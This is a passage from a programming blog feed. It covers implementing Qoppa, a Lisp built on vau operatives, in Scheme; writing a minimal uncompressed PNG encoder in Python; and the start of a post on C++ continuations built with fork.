<code>(lambda xs xs)</code>. In Qoppa it's more involved, because we must explicitly evaluate each argument. This is the hallmark of (meta)programming with operatives: we selectively evaluate using <code>eval</code>, rather than selectively suppressing evaluation using <code>quote</code>.</p><p>The last part of this code deserves closer scrutiny:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">eval</span> env (<span class="kw">cons</span> list (<span class="kw">cdr</span> xs)))</code></pre><p>What if the caller's environment <code>env</code> contains a local binding for the name <code>list</code>? Not to worry, because we aren't quoting the name <code>list</code>. We're building a cons pair whose car is the <em>value</em> of <code>list</code>... an operative! Supposing <code>xs</code> is <code>(1 2 3)</code>, the expression</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">cons</span> list (<span class="kw">cdr</span> xs))</code></pre><p>evaluates to the list</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(&lt;some-value-representing-an-operative&gt; <span class="dv">2</span> <span class="dv">3</span>)</code></pre><p>and <em>that's</em> what <code>eval</code> sees. Just like <code>lambda</code>, evaluating a <code>vau</code> expression captures the current environment. When the resulting operative is used, the <code>vau</code> body gets values from this captured static environment, not the dynamic argument of the caller. So we have lexical scoping by default, with the option of dynamic scoping thanks to that <code>env</code> parameter.</p><p>Compare this situation with Lisp or Scheme macros. Lisp macros build code which refers to external stuff by name. Maintaining <a href="http://en.wikipedia.org/wiki/Hygienic_macro">macro hygiene</a> requires constant attention by the programmer. Scheme's macros are hygienic by default, but the macro system is far more complex. Rather than writing ordinary functions, we have to use one of several <a href="http://community.schemewiki.org/?syntax-case">special-purpose sublanguages</a>. Operatives provide the safety of Scheme macros, but (like Lisp macros) they use only the core computational features of the language.</p><h1 id="implementing-qoppa">Implementing Qoppa</h1><p>Now that you have a taste of what the language is like, let's write a Qoppa interpreter in Scheme.</p><p>We will represent an environment as a list of frames, where a frame is simply an <a href="http://en.wikipedia.org/wiki/Association_list">association list</a>. Within the <code>vau</code> body in</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">( (<span class="kw">vau</span> (x) _ x) <span class="dv">3</span> )</code></pre><p>the current environment would be something like</p><pre><code>( ;; local frame<br /> ((x 3))<br /><br /> ;; global frame<br /> ((cons &lt;operative&gt;)<br /> (car &lt;operative&gt;)<br /> ...) )</code></pre><p>Here's a Scheme function to build a frame from some names and the corresponding values.</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(bind param val) (<span class="kw">cond</span><br /> ((<span class="kw">and</span> (<span class="kw">null?</span> param) (<span class="kw">null?</span> val))<br /> &#39;())<br /> ((<span class="kw">eq?</span> param &#39;_)<br /> &#39;())<br /> ((<span class="kw">symbol?</span> param)<br /> (<span class="kw">list</span> (<span class="kw">list</span> param val)))<br /> ((<span class="kw">and</span> (<span class="kw">pair?</span> param) (<span class="kw">pair?</span> val))<br /> (<span class="kw">append</span><br /> (bind (<span class="kw">car</span> param) (<span class="kw">car</span> val))<br /> (bind (<span class="kw">cdr</span> param) (<span class="kw">cdr</span> val))))<br /> (<span class="kw">else</span><br /> (error <span class="st">&quot;can&#39;t bind&quot;</span> param val))))</code></pre><p>We allow names and values to be arbitrary trees, so for example</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(bind<br /> &#39;((a b) . c)<br /> &#39;((<span class="dv">1</span> <span class="dv">2</span>) <span class="dv">3</span> <span class="dv">4</span>))</code></pre><p>evaluates to</p><pre class="sourceCode scheme"><code class="sourceCode scheme">((a <span class="dv">1</span>)<br /> (b <span class="dv">2</span>)<br /> (c (<span class="dv">3</span> <span class="dv">4</span>)))</code></pre><p>(If you'll recall, <code>(x . y)</code> is the pair formed by <code>(cons 'x 'y)</code>, an <a href="http://clhs.lisp.se/Body/26_glo_i.htm#improper_list">improper list</a>.) The generality of <code>bind</code> means our argument-binding syntax — in <code>vau</code>, <code>lambda</code>, <code>let</code>, etc. — will be richer than Scheme's.</p><p>Next, a function to find a <code>(name value)</code> entry, given the name and an environment. This just invokes <a href="http://www.math.grin.edu/~stone/scheme-web/assq.html"><code>assq</code></a> on each frame until we find a match.</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-lookup name env)<br /> (<span class="kw">if</span> (<span class="kw">null?</span> env)<br /> (error <span class="st">&quot;could not find&quot;</span> name)<br /> (<span class="kw">let</span> ((binding (<span class="kw">assq</span> name (<span class="kw">car</span> env))))<br /> (<span class="kw">if</span> binding<br /> binding<br /> (m-lookup name (<span class="kw">cdr</span> env))))))</code></pre><p>We also need a representation for operatives. A simple choice is that a Qoppa operative is represented by a Scheme procedure that takes the operands and current environment as arguments. Now we can write the Qoppa evaluator itself.</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-eval env exp) (<span class="kw">cond</span><br /> ((<span class="kw">symbol?</span> exp)<br /> (<span class="kw">cadr</span> (m-lookup exp env)))<br /> ((<span class="kw">pair?</span> exp)<br /> (m-operate env (m-eval env (<span class="kw">car</span> exp)) (<span class="kw">cdr</span> exp)))<br /> (<span class="kw">else</span><br /> exp)))<br /><br />(<span class="kw">define</span><span class="fu"> </span>(m-operate env operative operands)<br /> (operative env operands))</code></pre><p>The evaluator has only three cases. If <code>exp</code> is a symbol, it refers to a value in the current environment. If it's a cons pair, the car must evaluate to an operative and the cdr holds operands. Anything else evaluates to itself: numbers, strings, Booleans, and Qoppa operatives (represented by Scheme procedures).</p><p>Instead of the traditional <a href="http://icampus.mit.edu/xTutor/public/images/content/5/sicp-cover.jpg">eval and apply</a> we have &quot;eval&quot; and &quot;operate&quot;. Thanks to our uniform representation of operatives, the latter is very simple.</p><h1 id="qoppa-builtins">Qoppa builtins</h1><p>Now we need to populate the global environment with useful built-in operatives. <code>vau</code> is the most significant of these. Here is its corresponding Scheme procedure.</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-vau static-env vau-operands)<br /> (<span class="kw">let</span> ((params (<span class="kw">car</span> vau-operands))<br /> (env-param (<span class="kw">cadr</span> vau-operands))<br /> (body (<span class="kw">caddr</span> vau-operands)))<br /><br /> (<span class="kw">lambda</span> (dynamic-env operands)<br /> (m-eval<br /> (<span class="kw">cons</span><br /> (bind<br /> (<span class="kw">cons</span> env-param params)<br /> (<span class="kw">cons</span> dynamic-env operands))<br /> static-env)<br /> body))))</code></pre><p>When applying <code>vau</code>, you provide a parameter tree, a name for the caller's environment, and a body. The result of applying <code>vau</code> is an operative which, when applied, evaluates that body. It does so in the environment captured by <code>vau</code>, extended with arguments.</p><p>Here's the global environment:</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(make-global-frame)<br /> (<span class="kw">define</span><span class="fu"> </span>(wrap-primitive fun)<br /> (<span class="kw">lambda</span> (env operands)<br /> (apply fun (map (<span class="kw">lambda</span> (exp) (m-eval env exp)) operands))))<br /> (<span class="kw">list</span><br /> (<span class="kw">list</span> &#39;vau m-vau)<br /> (<span class="kw">list</span> &#39;eval (wrap-primitive m-eval))<br /> (<span class="kw">list</span> &#39;operate (wrap-primitive m-operate))<br /> (<span class="kw">list</span> &#39;lookup (wrap-primitive m-lookup))<br /> (<span class="kw">list</span> &#39;bool (wrap-primitive (<span class="kw">lambda</span> (b t f) (<span class="kw">if</span> b t f))))<br /> (<span class="kw">list</span> &#39;eq? (wrap-primitive <span class="kw">eq?</span>))<br /> <span class="co">; more like these</span><br /> ))<br /><br />(<span class="kw">define</span><span class="fu"> global-env </span>(<span class="kw">list</span> (make-global-frame)))</code></pre><p>Other than <code>vau</code>, each built-in operative evaluates all of its arguments. That's what <code>wrap-primitive</code> accomplishes. We can think of these as functions, whereas <code>vau</code> is something more exotic.</p><p>We expose the interpreter's <code>m-eval</code> and <code>m-operate</code>, which are essential for building new features as library code. We could implement <code>lookup</code> as library code; providing it here just prevents some code duplication.</p><p>The other functions inherited from Scheme are:</p><ul class="incremental"><li><p>Type predicates: <code>null?</code> <code>symbol?</code> <code>pair?</code></p></li><li><p>Pairs: <code>cons</code> <code>car</code> <code>cdr</code> <code>set-car!</code> <code>set-cdr!</code></p></li><li><p>Arithmetic: <code>+</code> <code>*</code> <code>-</code> <code>/</code> <code>&lt;=</code> <code>=</code></p></li><li><p>I/O: <code>error</code> <code>display</code> <code>open-input-file</code> <code>read</code> <code>eof-object</code></p></li></ul><h1 id="scheme-as-a-qoppa-library">Scheme as a Qoppa library</h1><p>The Qoppa interpreter uses Scheme syntax like <code>lambda</code>, <code>define</code>, <code>let</code>, <code>if</code>, etc. Qoppa itself supports none of this; all we get is <code>vau</code> and some basic data types. But this is enough to build a Qoppa library which provides all the Scheme features we used in the interpreter. This code starts out very cryptic, and becomes easier to read as we have more high-level features available. You can read through <a href="https://github.com/kmcallister/qoppa/blob/master/prelude.qop">the full library</a> if you like. This section will go over some of the more interesting parts.</p><p>Our first task is a bit of a puzzle: how do you define <code>define</code>? It's only possible because we expose the interpreter's representation of environments. We can push a new binding onto the top frame of <code>env</code>, like so:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">set-car!</span> env<br /> (<span class="kw">cons</span><br /> (<span class="kw">cons</span> &lt;name&gt; (<span class="kw">cons</span> &lt;value&gt; null))<br /> (<span class="kw">car</span> env)))</code></pre><p>We use this idea twice, once inside the <code>vau</code> body for <code>define</code>, and once to define <code>define</code> itself.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">((<span class="kw">vau</span> (name-of-define null) env<br /> (<span class="kw">set-car!</span> env (<span class="kw">cons</span><br /> (<span class="kw">cons</span> name-of-define<br /> (<span class="kw">cons</span> (<span class="kw">vau</span> (name exp) defn-env<br /> (<span class="kw">set-car!</span> defn-env (<span class="kw">cons</span><br /> (<span class="kw">cons</span> name (<span class="kw">cons</span> (<span class="kw">eval</span> defn-env exp) null))<br /> (<span class="kw">car</span> defn-env))))<br /> null))<br /> (<span class="kw">car</span> env))))<br /> define ())</code></pre><p>Next we'll define Scheme's <code>if</code>, which evaluates one branch or the other. We do this in terms of the Qoppa builtin <code>bool</code>, which always evaluates both branches.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define if (<span class="kw">vau</span> (b t f) env<br /> (<span class="kw">eval</span> env<br /> (<span class="kw">bool</span> (<span class="kw">eval</span> env b) t f))))</code></pre><p>We already saw the code for <code>list</code>, which evaluates each of its arguments. Many other operatives have this behavior, so we should abstract out the idea of &quot;evaluate all arguments&quot;. The operative <code>wrap</code> takes an operative and returns a transformed version of that operative, which evaluates all of its arguments.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define wrap (<span class="kw">vau</span> (operative) oper-env<br /> (<span class="kw">vau</span> args args-env<br /> (<span class="kw">operate</span> args-env<br /> (<span class="kw">eval</span> oper-env operative)<br /> (<span class="kw">operate</span> args-env list args)))))</code></pre><p>Now we can implement <code>lambda</code> as an operative that builds a <code>vau</code> term, <code>eval</code>s it, and then <code>wraps</code> the resulting operative.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define lambda (<span class="kw">vau</span> (params body) static-env<br /> (wrap<br /> (<span class="kw">eval</span> static-env<br /> (list <span class="kw">vau</span> params &#39;_ body)))))</code></pre><p>This works just like Scheme's <code>lambda</code>:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define fact (lambda (n)<br /> (if (<span class="kw">&lt;=</span> n <span class="dv">1</span>)<br /> <span class="dv">1</span><br /> (<span class="kw">*</span> n (fact (<span class="kw">-</span> n <span class="dv">1</span>))))))</code></pre><p>Actually, it's incomplete, because Scheme's <code>lambda</code> allows an arbitrary number of expressions in the body. In other words Scheme's</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">lambda</span> (x) a b c)</code></pre><p>is syntactic sugar for</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">lambda</span> (x) (<span class="kw">begin</span> a b c))</code></pre><p><code>begin</code> evaluates its arguments in order left to right, and returns the value of the last one. In Scheme it's a special form, because normal argument evaluation happens in an undefined order. By contrast, the Qoppa interpreter implements a left-to-right order, so we'll define <code>begin</code> as a function.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define last (lambda (xs)<br /> (if (<span class="kw">null?</span> (<span class="kw">cdr</span> xs))<br /> (<span class="kw">car</span> xs)<br /> (last (<span class="kw">cdr</span> xs)))))<br /><br />(define begin (lambda xs (last xs)))</code></pre><p>Now we can mutate the binding for <code>lambda</code> to support multiple expressions.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define set! (<span class="kw">vau</span> (name exp) env<br /> (<span class="kw">set-cdr!</span><br /> (<span class="kw">lookup</span> name env)<br /> (list (<span class="kw">eval</span> env exp)))))<br /><br />(set! lambda<br /> ((lambda (base-lambda)<br /> (<span class="kw">vau</span> (param . body) env<br /> (<span class="kw">eval</span> env (list base-lambda param (<span class="kw">cons</span> begin body)))))<br /> lambda))</code></pre><p>Note the structure</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">((lambda (base-lambda) ...) lambda)</code></pre><p>which holds on to the original <code>lambda</code> operative, in a private frame. That's right, we're using <code>lambda</code> to save <code>lambda</code> so we can overwrite <code>lambda</code>. We use the same approach when defining other sugar, such as the implicit <code>lambda</code> in <code>define</code>.</p><p>There are some more bits of Scheme we need to implement: <code>cond</code>, <code>let</code>, <code>map</code>, <code>append</code>, and so forth. These are mostly straightforward; read the code if you want the full story. By far the most troublesome was Scheme's <code>apply</code> function, which takes a function and a list of arguments, and is supposed to apply the function to those arguments. The problem is that our functions are really operatives, and expect to call <code>eval</code> on each of their arguments. If we already have the values in a list, how do we pass them on?</p><p>Qoppa and Kernel have very different solutions to this problem. In Kernel, &quot;applicatives&quot; (things that evaluate all their arguments) are a distinct type from operatives. <code>wrap</code> is the primitive constructor of applicatives, and its inverse <code>unwrap</code> is used to implement <code>apply</code>. This design choice simplifies <code>apply</code> but complicates the core evaluator, which needs to distinguish applicatives from operatives.</p><p>For Qoppa I implemented <code>wrap</code> as a library function, which we saw before. But then we don't have <code>unwrap</code>. So <code>apply</code> takes the uglier approach of quoting each argument to prevent double-evaluation.</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define apply (wrap (<span class="kw">vau</span> (operative args) env<br /> (<span class="kw">eval</span> env (<span class="kw">cons</span><br /> operative<br /> (map (lambda (x) (list quote x)) args))))))</code></pre><p>In either Kernel or Qoppa, you're not allowed to apply <code>apply</code> to something that doesn't evaluate all of its arguments.</p><h1 id="testing">Testing</h1><p>The code we saw above is split into two files:</p><ul class="incremental"><li><p><a href="https://github.com/kmcallister/qoppa/blob/master/qoppa.scm"><code>qoppa.scm</code></a> is the Qoppa interpreter, written in Scheme</p></li><li><p><a href="https://github.com/kmcallister/qoppa/blob/master/prelude.qop"><code>prelude.qop</code></a> is the Qoppa code which defines <code>wrap</code>, <code>lambda</code>, etc.</p></li></ul><p>I defined a procedure <code>execute-file</code> which reads a file from disk and runs each expression through <code>m-eval</code>. The last line of <code>qoppa.scm</code> is</p><pre class="sourceCode scheme"><code class="sourceCode scheme">(execute-file <span class="st">&quot;prelude.qop&quot;</span>)</code></pre><p>so the definitions in <code>prelude.qop</code> are available immediately.</p><p>We start by loading <code>qoppa.scm</code> into a Scheme interpreter. I'm using <a href="http://www.gnu.org/software/guile/">Guile</a> here, but I've actually tested this with a variety of <a href="http://www.schemers.org/Documents/Standards/R5RS/">R5RS</a> implementations.</p><pre><code><span class="Prompt">$</span> <span class="Entry">guile -l qoppa.scm</span><br /><span class="Prompt">guile&gt;</span> <span class="Entry">(m-eval global-env &#39;(fact 5))</span><br />$1 = 120</code></pre><p>This establishes that we've implemented the features used by <code>fact</code>, such as <code>define</code> and <code>lambda</code>. But did we actually implement enough to run the Qoppa interpreter? To test this, we need to go deeper.</p><pre><code><span class="Prompt">guile&gt;</span> <span class="Entry">(execute-file &quot;qoppa.scm&quot;)</span><br />$2 = done<br /><span class="Prompt">guile&gt;</span> <span class="Entry">(m-eval global-env &#39;(m-eval global-env &#39;(fact 5)))</span><br />$3 = 120</code></pre><p>This is factorial implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme (implemented in C). Of course it's outrageously slow; on my machine this <code>(fact 5)</code> takes about 5 minutes. But it demonstrates that a tiny language of operatives, augmented with an appropriate library, can provide enough syntactic features to run a non-trivial Scheme program. As for how to do this <em>efficiently</em>, well, I haven't got far enough into the literature to have any idea.</p>http://mainisusuallyafunction.blogspot.com/2012/04/scheme-without-special-forms.htmlnoreply@blogger.com (keegan)5tag:blogger.com,1999:blog-1563623855220143059.post-1775682818073510143Thu, 05 Apr 2012 08:24:00 +00002012-04-05T01:24:01.822-07:00codepngpythonA minimal encoder for uncompressed PNGs<p>I've often wondered how hard it is to output a <a href="http://en.wikipedia.org/wiki/Portable_Network_Graphics">PNG</a> file directly, without using a library or a standard tool like <a href="http://netpbm.sourceforge.net/"><code>pnmtopng</code></a>. (I'm not sure when you'd actually want to do this; maybe for a tiny embedded system with a web interface.)</p><p>I found that constructing a simple, uncompressed PNG does not require a whole lot of code, but there are some odd details I got wrong on the first try. Here's a crash course in writing a minimal PNG encoder. We'll use only a small subset of <a href="http://www.w3.org/TR/PNG/">the PNG specification</a>, but I'll link to the full spec so you can read more.</p><p>The example code is not too fast; it's written in Python and has tons of string copying everywhere. My goal was to express the idea clearly, and let you worry about coding it up in C for your embedded system or whatever. If you're careful, you can avoid ever copying the image data.</p><p>We will assume the raw image data is a Python byte string (non-Unicode), consisting of one byte each for red, green, and blue, for each pixel in English reading order. For reference, here is how we'd &quot;encode&quot; this data in the much simpler <a href="http://manpages.ubuntu.com/manpages/oneiric/man5/ppm.5.html">PPM</a> format.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> to_ppm(width, height, data):<br /> <span class="kw">return</span> <span class="st">'P6</span><span class="ch">\n</span><span class="ot">%d</span><span class="st"> </span><span class="ot">%d</span><span class="ch">\n</span><span class="st">255</span><span class="ch">\n</span><span class="ot">%s</span><span class="st">'</span> % (width, height, data)</code></pre><p>I lied when I said we'd use no libraries at all. I will import Python's standard <a href="http://docs.python.org/library/struct.html"><code>struct</code></a> module. I figured an exercise in converting integers to 4-byte <a href="http://en.wikipedia.org/wiki/Endianness">big endian</a> format would be excessively boring. Here's how we do it with <code>struct</code>.</p><pre class="sourceCode"><code class="sourceCode python"><span class="ch">import</span> struct<br /><br /><span class="kw">def</span> be32(n):<br /> <span class="kw">return</span> struct.pack(<span class="st">'&gt;I'</span>, n)</code></pre><p>A PNG file contains a sequence of <a href="http://www.w3.org/TR/PNG/#5Chunk-layout">data chunks</a>, each with an associated length, type, and <a href="http://www.w3.org/TR/PNG/#5CRC-algorithm">CRC checksum</a>. The type is a 4-byte quantity which can be <a href="http://www.w3.org/TR/PNG/#5Chunk-naming-conventions">interpreted</a> as four ASCII letters. We'll implement <code>crc</code> later.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> png_chunk(ty, data):<br /> <span class="kw">return</span> be32(<span class="dt">len</span>(data)) + ty + data + be32(crc(ty + data))</code></pre><p>The <a href="http://www.w3.org/TR/PNG/#11IHDR"><code>IHDR</code> chunk</a>, always the first chunk in a file, contains basic header information such as width and height. We will hardcode a color depth of 8 bits, <a href="http://www.w3.org/TR/PNG/#6Colour-values">color type</a> 2 (RGB truecolor), and standard 0 values for the other fields.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> png_header(width, height):<br /> <span class="kw">return</span> png_chunk(<span class="st">'IHDR'</span>,<br /> struct.pack(<span class="st">'&gt;IIBBBBB'</span>, width, height, <span class="dv">8</span>, <span class="dv">2</span>, <span class="dv">0</span>, <span class="dv">0</span>, <span class="dv">0</span>))</code></pre><p>The actual image data is stored in <a href="http://www.ietf.org/rfc/rfc1951.txt">DEFLATE</a> format, the same compression used by <a href="http://en.wikipedia.org/wiki/Gzip">gzip</a> and friends. Fortunately for our minimalist project, DEFLATE allows uncompressed blocks. Each one has a 5-byte header: the byte <code>0</code> (or <code>1</code> for the last block), followed by a 16-bit data length, and then the same length value with all of the bits flipped. Note that these are <em>little-endian</em> numbers, unlike the rest of PNG. Never assume a format is internally consistent!</p><pre class="sourceCode"><code class="sourceCode python">MAX_DEFLATE = <span class="bn">0xffff</span><br /><span class="kw">def</span> deflate_block(data, last=<span class="ot">False</span>):<br /> n = <span class="dt">len</span>(data)<br /> <span class="kw">assert</span> n &lt;= MAX_DEFLATE<br /> <span class="kw">return</span> struct.pack(<span class="st">'&lt;BHH'</span>, <span class="dt">bool</span>(last), n, <span class="bn">0xffff</span> ^ n) + data</code></pre><p>Since a DEFLATE block can only hold 64 kB, we'll need to split our image data into multiple blocks. We will actually want a more general function to <a href="http://code.activestate.com/recipes/496784-split-string-into-n-size-pieces/">split a sequence</a> into chunks of size <code>n</code> (allowing the last chunk to be smaller than <code>n</code>).</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> pieces(seq, n):<br /> <span class="kw">return</span> [seq[i:i+n] <span class="kw">for</span> i in <span class="dt">xrange</span>(<span class="dv">0</span>, <span class="dt">len</span>(seq), n)]</code></pre><p>PNG wants the DEFLATE blocks to be encapsulated as a <a href="http://www.ietf.org/rfc/rfc1950.txt">zlib data stream</a>. For our purposes, this means we prefix a header of <code>78 01</code> hex, and suffix an <a href="http://en.wikipedia.org/wiki/Adler-32">Adler-32 checksum</a> of the &quot;decompressed&quot; data. That's right, a self-contained PNG encoder needs to implement <em>two different</em> checksum algorithms.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> zlib_stream(data):<br /> segments = pieces(data, MAX_DEFLATE)<br /><br /> blocks = <span class="st">''</span>.join(deflate_block(p) <span class="kw">for</span> p in segments[:-<span class="dv">1</span>])<br /> blocks += deflate_block(segments[-<span class="dv">1</span>], last=<span class="ot">True</span>)<br /><br /> <span class="kw">return</span> <span class="st">'</span><span class="ch">\x78\x01</span><span class="st">'</span> + blocks + be32(adler32(data))</code></pre><p>We're almost done, but there's one more wrinkle. PNG has a pre-compression <a href="http://www.w3.org/TR/PNG/#9Filters">filter</a> step, which transforms a scanline of data at a time. A filter doesn't change the size of the image data, but is supposed to expose redundancies, leading to better compression. We aren't compressing anyway, so we choose the no-op filter. This means we prefix a zero byte to each scanline.</p><p>At last we can build the PNG file. It consists of the <a href="http://www.w3.org/TR/PNG/#5PNG-file-signature">magic PNG signature</a>, a header chunk, our zlib stream inside an <a href="http://www.w3.org/TR/PNG/#11IDAT"><code>IDAT</code> chunk</a>, and an empty <a href="http://www.w3.org/TR/PNG/#11IEND"><code>IEND</code> chunk</a> to mark the end of the file.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> to_png(width, height, data):<br /> lines = <span class="st">''</span>.join(<span class="st">'\0'</span>+p <span class="kw">for</span> p in pieces(data, <span class="dv">3</span>*width))<br /><br /> <span class="kw">return</span> (<span class="st">'</span><span class="ch">\x89</span><span class="st">PNG</span><span class="ch">\r\n\x1a\n</span><span class="st">'</span><br /> + png_header(width, height)<br /> + png_chunk(<span class="st">'IDAT'</span>, zlib_stream(lines))<br /> + png_chunk(<span class="st">'IEND'</span>, <span class="st">''</span>))</code></pre><p>Actually, a PNG file may contain any number of <code>IDAT</code> chunks. The zlib stream is given by the concatenation of their contents. It might be convenient to emit one <code>IDAT</code> chunk per DEFLATE block. But the <code>IDAT</code> boundaries really <a href="http://www.w3.org/TR/PNG/#10CompressionFSL">can</a> occur anywhere, even halfway through the zlib checksum. This flexibility is convenient for encoders, and a hassle for decoders. For example, one of <a href="http://en.wikipedia.org/wiki/Portable_Network_Graphics#Web_browser_support_for_PNG">many historical PNG bugs</a> in Internet Explorer is triggered by <a href="http://support.microsoft.com/kb/897242">empty <code>IDAT</code> chunks</a>.</p><p>Here are those checksum algorithms we need. My CRC function follows the approach of <a href="http://en.wikipedia.org/wiki/Computation_of_CRC#Bit_ordering_.28Endianness.29">code fragment 5</a> from Wikipedia. For better performance you would want to precompute a lookup table, as <a href="http://www.w3.org/TR/PNG/#D-CRCAppendix">suggested</a> by the PNG spec.</p><pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> crc(data):<br /> c = <span class="bn">0xffffffff</span><br /> <span class="kw">for</span> x in data:<br /> c ^= <span class="dt">ord</span>(x)<br /> <span class="kw">for</span> k in <span class="dt">xrange</span>(<span class="dv">8</span>):<br /> v = <span class="bn">0xedb88320</span> <span class="kw">if</span> c &amp; <span class="dv">1</span> <span class="kw">else</span> <span class="dv">0</span><br /> c = v ^ (c &gt;&gt; <span class="dv">1</span>)<br /> <span class="kw">return</span> c ^ <span class="bn">0xffffffff</span><br /><br /><span class="kw">def</span> adler32(data):<br /> s1, s2 = <span class="dv">1</span>, <span class="dv">0</span><br /> <span class="kw">for</span> x in data:<br /> s1 = (s1 + <span class="dt">ord</span>(x)) % <span class="dv">65521</span><br /> s2 = (s2 + s1) % <span class="dv">65521</span><br /> <span class="kw">return</span> (s2 &lt;&lt; <span class="dv">16</span>) + s1</code></pre><p>Now we can test this code. We'll generate a grid of red-green-yellow gradients, and write it in both PPM and PNG formats.</p><pre class="sourceCode"><code class="sourceCode python">w, h = <span class="dv">500</span>, <span class="dv">300</span><br />img = <span class="st">''</span><br /><span class="kw">for</span> y in <span class="dt">xrange</span>(h):<br /> <span class="kw">for</span> x in <span class="dt">xrange</span>(w):<br /> img += <span class="dt">chr</span>(x % <span class="dv">256</span>) + <span class="dt">chr</span>(y % <span class="dv">256</span>) + <span class="st">'\0'</span><br /><br /><span class="dt">open</span>(<span class="st">'out.ppm'</span>, <span class="st">'wb'</span>).write(to_ppm(w, h, img))<br /><span class="dt">open</span>(<span class="st">'out.png'</span>, <span class="st">'wb'</span>).write(to_png(w, h, img))</code></pre><p>Then we can verify that the two files contain identical image data.</p><pre><code>$ pngtopnm out.png | sha1sum - out.ppm<br />e19c1229221c608b2a45a4488f9959403b8630a0 -<br />e19c1229221c608b2a45a4488f9959403b8630a0 out.ppm<br /></code></pre><p>That's it! As usual, the code is on <a href="https://github.com/kmcallister/blog-misc/tree/master/minpng/minpng.py">GitHub</a>. You can also read what others have written on similar subjects <a href="http://drj11.wordpress.com/2007/11/20/a-use-for-uncompressed-pngs/">here</a>, <a href="https://github.com/jrmuizel/minpng">here</a>, <a href="http://gareth-rees.livejournal.com/9988.html">here</a>, or <a href="http://www.chrfr.de/software/midp_png.html">here</a>.</p>http://mainisusuallyafunction.blogspot.com/2012/04/minimal-encoder-for-uncompressed-pngs.htmlnoreply@blogger.com (keegan)2tag:blogger.com,1999:blog-1563623855220143059.post-6031546447791889885Tue, 14 Feb 2012 09:26:00 +00002015-01-11T22:18:20.297-08:00codecontinuationscxxdonttrythisathomeContinuations in C++ with fork<p>[Update, Jan 2015: I've <a href="https://github.com/kmcallister/forkallcc">translated this code into Rust</a>.]</p><p>While reading &quot;<a href="http://homepage.mac.com/sigfpe/Computing/continuations.html">Continuations in C</a>&quot; I came across an intriguing idea:</p><blockquote><p>It is possible to simulate <code>call/cc</code>, or something like it, on Unix systems with system calls like <code>fork()</code> that literally duplicate the running process.</p></blockquote><p>The author sets this idea aside, and instead discusses some code that uses <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/setjmp.3.html"><code>setjmp</code></a>/<a href="http://www.kernel.org/doc/man-pages/online/pages/man3/longjmp.3.html"><code>longjmp</code></a> and stack copying. And there are several other <a href="http://en.wikipedia.org/wiki/Continuation">continuation</a>-like constructs available for C, such as POSIX <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/getcontext.2.html"><code>getcontext</code></a>. But the idea of implementing <a href="http://en.wikipedia.org/wiki/Call-with-current-continuation"><code>call/cc</code></a> with <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/fork.2.html"><code>fork</code></a> stuck with me, if only for its amusement value. I'd seen <code>fork</code> used for <a href="http://okmij.org/ftp/continuations/shift-v-fork.html#implementation-C">computing with probability distributions</a>, but I couldn't find an implementation of <code>call/cc</code> itself. So I decided to give it a shot, using my favorite <a href="http://esoteric.voxelperfect.net/wiki/Main_Page">esolang</a>, C++.</p> <p>Continuations are a famously mind-bending idea, and this article doesn't totally explain what they are or what they're good for. If you aren't familiar with continuations, you might catch on from the examples, or you might want to consult another source first (<a href="http://en.wikipedia.org/wiki/Continuation">1</a>, <a href="http://www.madore.org/~david/computers/callcc.html">2</a>, <a href="http://community.schemewiki.org/?call-with-current-continuation">3</a>, <a href="http://community.schemewiki.org/?call-with-current-continuation-for-C-programmers">4</a>, <a href="http://www.ps.uni-saarland.de/~duchier/python/continuations.html">5</a>, <a href="http://web.mit.edu/alexmv/6.S184/l7-continuations.pdf">6</a>).</p><h1 id="small-examples">Small examples</h1><p>I'll get to the implementation later, but right now let's see what these <code>fork</code>-based continuations can do. The interface looks like this.</p> <pre class="sourceCode"><code class="sourceCode cpp"><span class="kw">template</span> &lt;<span class="kw">typename</span> T&gt;<br /><span class="kw">class</span> cont {<br /><span class="kw">public</span>:<br /> <span class="dt">void</span> <span class="kw">operator</span>()(<span class="dt">const</span> T &amp;x);<br />};<br /><br /><span class="kw">template</span> &lt;<span class="kw">typename</span> T&gt;<br />T call_cc( std::function&lt; T (cont&lt;T&gt;) &gt; f );</code></pre> <p><a href="http://en.cppreference.com/w/cpp/utility/functional/function"><code>std::function</code></a> is a wrapper that can hold function-like values, such as function objects or C-style function pointers. So <code>call_cc&lt;T&gt;</code> will accept any function-like value that takes an argument of type <code>cont&lt;T&gt;</code> and returns a value of type <code>T</code>. This wrapper is the first of several <a 